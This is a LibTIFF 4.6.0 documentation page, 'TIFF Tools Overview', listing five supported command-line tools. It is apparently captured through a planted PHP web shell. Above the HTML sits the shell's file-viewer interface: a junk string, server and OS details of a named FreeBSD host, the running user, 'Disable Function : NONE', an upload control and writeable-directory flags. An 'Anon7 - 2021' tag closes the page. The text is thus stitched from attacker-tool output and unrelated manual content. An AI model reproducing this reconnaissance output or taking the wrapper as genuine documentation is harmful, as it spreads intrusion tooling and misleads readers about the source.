KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /usr/local/share/doc/tiff-4.6.0/manual/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/share/doc/tiff-4.6.0/manual/tools.html
<!DOCTYPE html>

<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.19: https://docutils.sourceforge.io/" />

    <title>TIFF Tools Overview &#8212; LibTIFF 4.6.0 documentation</title>
    <link rel="stylesheet" type="text/css" href="_static/pygments.css" />
    <link rel="stylesheet" type="text/css" href="_static/sphinxdoc.css" />
    <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script>
    <script src="_static/doctools.js"></script>
    <script src="_static/sphinx_highlight.js"></script>
    <link rel="index" title="Index" href="genindex.html" />
    <link rel="search" title="Search" href="search.html" />
    <link rel="next" title="tiffcp" href="tools/tiffcp.html" />
    <link rel="prev" title="Defining New TIFF Tags" href="addingtags.html" /> 
  </head><body>
    <div class="related" role="navigation" aria-label="related navigation">
      <h3>Navigation</h3>
      <ul>
        <li class="right" style="margin-right: 10px">
          <a href="genindex.html" title="General Index"
             accesskey="I">index</a></li>
        <li class="right" >
          <a href="tools/tiffcp.html" title="tiffcp"
             accesskey="N">next</a> |</li>
        <li class="right" >
          <a href="addingtags.html" title="Defining New TIFF Tags"
             accesskey="P">previous</a> |</li>
        <li class="nav-item nav-item-0"><a href="index.html">LibTIFF 4.6.0 documentation</a> &#187;</li>
        <li class="nav-item nav-item-this"><a href="">TIFF Tools Overview</a></li> 
      </ul>
    </div>  

    <div class="document">
      <div class="documentwrapper">
        <div class="bodywrapper">
          <div class="body" role="main">
            
  <section id="tiff-tools-overview">
<h1>TIFF Tools Overview<a class="headerlink" href="#tiff-tools-overview" title="Permalink to this heading">¶</a></h1>
<a class="reference internal image-reference" href="_images/quad.jpg"><img alt="quad" src="_images/quad.jpg" style="width: 144px;" /></a>
<p>Since LibTIFF version 4.6.0 only five tools are suported.
Two tools can be built as unsupported into directory
<code class="file docutils literal notranslate"><span class="pre">tools/unsupported</span></code>.
The source code of the other tools is moved to directory
<code class="file docutils literal notranslate"><span class="pre">archive/tools/</span></code>.
This source code still serves as a programming example
for the use of the TIFF library.</p>
<section id="manual-pages">
<h2>Manual pages<a class="headerlink" href="#manual-pages" title="Permalink to this heading">¶</a></h2>
<div class="toctree-wrapper compound">
<ul>
<li class="toctree-l1"><a class="reference internal" href="tools/tiffcp.html">tiffcp</a></li>
<li class="toctree-l1"><a class="reference internal" href="tools/tiffdump.html">tiffdump</a></li>
<li class="toctree-l1"><a class="reference internal" href="tools/tiffinfo.html">tiffinfo</a></li>
<li class="toctree-l1"><a class="reference internal" href="tools/tiffset.html">tiffset</a></li>
<li class="toctree-l1"><a class="reference internal" href="tools/tiffsplit.html">tiffsplit</a></li>
</ul>
</div>
</section>
<section id="programs">
<h2>Programs<a class="headerlink" href="#programs" title="Permalink to this heading">¶</a></h2>
<table class="docutils align-default" id="id1">
<caption><span class="caption-text">Programs</span><a class="headerlink" href="#id1" title="Permalink to this table">¶</a></caption>
<colgroup>
<col style="width: 20.0%" />
<col style="width: 80.0%" />
</colgroup>
<thead>
<tr class="row-odd"><th class="head"><p>Tool</p></th>
<th class="head"><p>Description</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p><a class="reference internal" href="tools/tiffcp.html"><span class="doc">tiffcp</span></a></p></td>
<td><p>Copy, concatenate, and convert TIFF images (e.g. switching from
<code class="docutils literal notranslate"><span class="pre">Compression=5</span></code> to <code class="docutils literal notranslate"><span class="pre">Compression=1</span></code>)</p></td>
</tr>
<tr class="row-odd"><td><p><a class="reference internal" href="tools/tiffdump.html"><span class="doc">tiffdump</span></a></p></td>
<td><p>Display the verbatim contents of the TIFF directory in a file
(it’s very useful for debugging bogus files that you may get from
someone that claims they support TIFF)</p></td>
</tr>
<tr class="row-even"><td><p><a class="reference internal" href="tools/tiffinfo.html"><span class="doc">tiffinfo</span></a></p></td>
<td><p>Display information about one or more TIFF files</p></td>
</tr>
<tr class="row-odd"><td><p><a class="reference internal" href="tools/tiffset.html"><span class="doc">tiffset</span></a></p></td>
<td><p>Set a field in a TIFF header</p></td>
</tr>
<tr class="row-even"><td><p><a class="reference internal" href="tools/tiffsplit.html"><span class="doc">tiffsplit</span></a></p></td>
<td><p>Create one or more single-image files from a (possibly)
multi-image file</p></td>
</tr>
</tbody>
</table>
<p>Check out the manual pages for details about the above programs.</p>
</section>
</section>


            <div class="clearer"></div>
          </div>
        </div>
      </div>
      <div class="sphinxsidebar" role="navigation" aria-label="main navigation">
        <div class="sphinxsidebarwrapper">
  <div>
    <h3><a href="index.html">Table of Contents</a></h3>
    <ul>
<li><a class="reference internal" href="#">TIFF Tools Overview</a><ul>
<li><a class="reference internal" href="#manual-pages">Manual pages</a></li>
<li><a class="reference internal" href="#programs">Programs</a></li>
</ul>
</li>
</ul>

  </div>
  <div>
    <h4>Previous topic</h4>
    <p class="topless"><a href="addingtags.html"
                          title="previous chapter">Defining New TIFF Tags</a></p>
  </div>
  <div>
    <h4>Next topic</h4>
    <p class="topless"><a href="tools/tiffcp.html"
                          title="next chapter">tiffcp</a></p>
  </div>
  <div role="note" aria-label="source link">
    <h3>This Page</h3>
    <ul class="this-page-menu">
      <li><a href="_sources/tools.rst.txt"
            rel="nofollow">Show Source</a></li>
    </ul>
   </div>
<div id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</div>
<script>document.getElementById('searchbox').style.display = "block"</script>
        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div class="related" role="navigation" aria-label="related navigation">
      <h3>Navigation</h3>
      <ul>
        <li class="right" style="margin-right: 10px">
          <a href="genindex.html" title="General Index"
             >index</a></li>
        <li class="right" >
          <a href="tools/tiffcp.html" title="tiffcp"
             >next</a> |</li>
        <li class="right" >
          <a href="addingtags.html" title="Defining New TIFF Tags"
             >previous</a> |</li>
        <li class="nav-item nav-item-0"><a href="index.html">LibTIFF 4.6.0 documentation</a> &#187;</li>
        <li class="nav-item nav-item-this"><a href="">TIFF Tools Overview</a></li> 
      </ul>
    </div>
    <div class="footer" role="contentinfo">
        &#169; Copyright 1988-2022, LibTIFF contributors.
      Created using <a href="https://www.sphinx-doc.org/">Sphinx</a> 7.0.1.
    </div>
  </body>
</html>

Anon7 - 2021